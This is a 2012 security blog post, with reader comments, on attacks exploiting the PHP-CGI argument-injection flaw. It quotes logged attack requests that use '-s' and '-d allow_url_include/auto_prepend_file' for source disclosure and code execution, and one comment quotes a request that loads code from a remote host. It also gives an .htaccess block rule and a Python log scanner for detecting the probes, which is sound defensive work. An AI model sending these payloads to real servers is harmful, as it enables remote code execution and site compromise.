PHP-CGI Vulnerability Exploited in the Wild

May 8, 2012, by Daniel Cid

When the PHP-CGI vulnerability was disclosed, we knew it would be just a matter of days before it started to be exploited in the wild.

Well, it didn’t take long. Since the weekend, we started to see scanners looking for that vulnerability on our servers and honeypots. And now we are seeing sites getting compromised through it as well.

Understanding the Attack

So far we have seen the attack start in one of two ways. Either the attacker first checks whether the server is vulnerable using the ?-s option (which makes php-cgi display the source of the page):

88.198.51.36 - - [06/May/2012:07:51:36 -0400] "GET /index.php?-s HTTP/1.1" 301

Or they go straight for code execution by passing -d options that enable allow_url_include and point auto_prepend_file at the request body (php://input) or at an externally hosted shell:

84.247.61.27 - - [07/May/2012:17:16:58 -0400] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 301 - "-" "-"

If the attack succeeds, the attacker uploads a backdoor to a random location in the compromised site's file system and uses it to continue exploiting the server.

It is also important to note that even though we are only seeing those two "flags" being used (-s and -d), php-cgi has many options and any of them can be passed the same way:

$ php-cgi -h
-a                       Run interactively
-b <address:port>|<port> Bind Path for external FASTCGI Server mode
-C                       Do not chdir to the script's directory
-c <path>|<file>         Look for php.ini file in this directory
-n                       No php.ini file will be used
-d foo[=bar]             Define INI entry foo with value 'bar'
-e                       Generate extended information for debugger/profiler
-f <file>                Parse <file>. Implies `-q'
-h                       This help
-i                       PHP information
-l                       Syntax check only (lint)
-m                       Show compiled in modules
-q                       Quiet-mode. Suppress HTTP Header output.
-s                       Display colour syntax highlighted source.
-v                       Version number
-w                       Display source with stripped comments and whitespace.
-z <file>                Load Zend extension <file>.
-T <count>               Measure execution time of script repeated <count> times.

Attacker IP addresses

Via our honeypots, we detected the following IP addresses trying to exploit this vulnerability:


And this list is likely to keep growing.

Protecting yourself

The PHP team is recommending the following .htaccess workaround to block these attacks (it rejects any request whose query string contains no "=" but does contain a hyphen, plain or encoded as %2d):

RewriteEngine on
RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|- [NC]
RewriteRule .? - [F,L]

But the best option is to update PHP as soon as possible (a fix is already available), or to stop using the CGI setup and move to the PHP module (if using Apache) or to FastCGI.
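To check existing access logs for the probes shown above, the following added example (not part of the original post) applies the same condition as the .htaccess workaround to each request and decodes the query string the way CGI turns it into php-cgi arguments. The log lines are constructed samples modelled on the ones quoted in the post, plus one benign request for contrast.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format): the two
# probe requests quoted in the post, plus a normal request that carries a
# hyphen but also an "=", so the rewrite rule must leave it alone.
SAMPLE_LOG = """\
88.198.51.36 - - [06/May/2012:07:51:36 -0400] "GET /index.php?-s HTTP/1.1" 301 - "-" "-"
84.247.61.27 - - [07/May/2012:17:16:58 -0400] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 301 - "-" "-"
10.0.0.5 - - [07/May/2012:17:20:01 -0400] "GET /index.php?id=42&sort=-date HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')


def query_string(target):
    """Raw (still URL-encoded) query string of a request target, or ''."""
    return target.partition("?")[2]


def matches_rewrite_rule(qs):
    """Same test as the two RewriteCond lines: no '=' anywhere in the raw
    query string, and a hyphen present either literally or as %2d."""
    return "=" not in qs and re.search(r"%2d|-", qs, re.IGNORECASE) is not None


def cgi_argv(qs):
    """How a CGI query string without '=' reaches php-cgi: split on '+',
    then percent-decode each piece into a separate argv entry."""
    return [unquote(part) for part in qs.split("+") if part]


def scan(log_text):
    """Return (client ip, method, decoded php-cgi argv) for each request
    that the .htaccess workaround would have rejected."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = query_string(m.group("target"))
        if matches_rewrite_rule(qs):
            hits.append((m.group("ip"), m.group("method"), cgi_argv(qs)))
    return hits


if __name__ == "__main__":
    for ip, method, argv in scan(SAMPLE_LOG):
        print(f"{ip} {method} -> php-cgi {' '.join(argv)}")
```

Because the rule only fires when the query string contains no "=", the benign third request passes even though it contains a hyphen, while the two probes are flagged with the exact options they tried to hand to php-cgi.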

More details to come!

Update 1:
Facebook is playing with this vulnerability and added the following job link on their page: https://facebook.com/?-s (for anyone that is probing for this):

include_once 'https://www.facebook.com/careers/department?dept=engineering&req=a2KA0000000Lt8LMAS';


About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Comments

  1. Jon Brown

    May 8, 2012

    That Facebook update is awesome 🙂

  2. Will

    May 9, 2012

    Until WHM/CPanel comes out with an update, is it possible to thwart this at a server level, or would we need to add that snippet to every website's htaccess file?

  3. jibudada

    May 18, 2012

    good stuff. keep it up. have a look on this also.
    http://www.securitytube.net/groups?operation=view&groupId=7

  4. Anonymous Me

    June 22, 2012

    In C:\WINDOWS\system32\LogFiles\HTTPERR
    I discovered entries such as:

    2012-06-20 20:59:21 122.183.65.5 59537 ***.***.***.*** 80 HTTP/1.1 POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://216.67.238.249/images/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://216.67.238.249/images/api.gif%20-n 411 – LengthRequired –

    Using tool: http://www.webtoolhub.com/tn561351-url-deobfuscator.aspx
    That URL deobfuscates to:

    /?-d allow_url_include=On+-d auto_prepend_file=http://216.67.238.249/images/api.gif -n/?-d allow_url_include=On+-d auto_prepend_file=http://216.67.238.249/images/api.gif -n

    Note the IPs referenced:
    216.67.238.249
    122.183.65.5

  5. Sajid Toor

    November 2, 2012

    Highly descriptive post, I enjoyed that bit. Will there be a part 2?
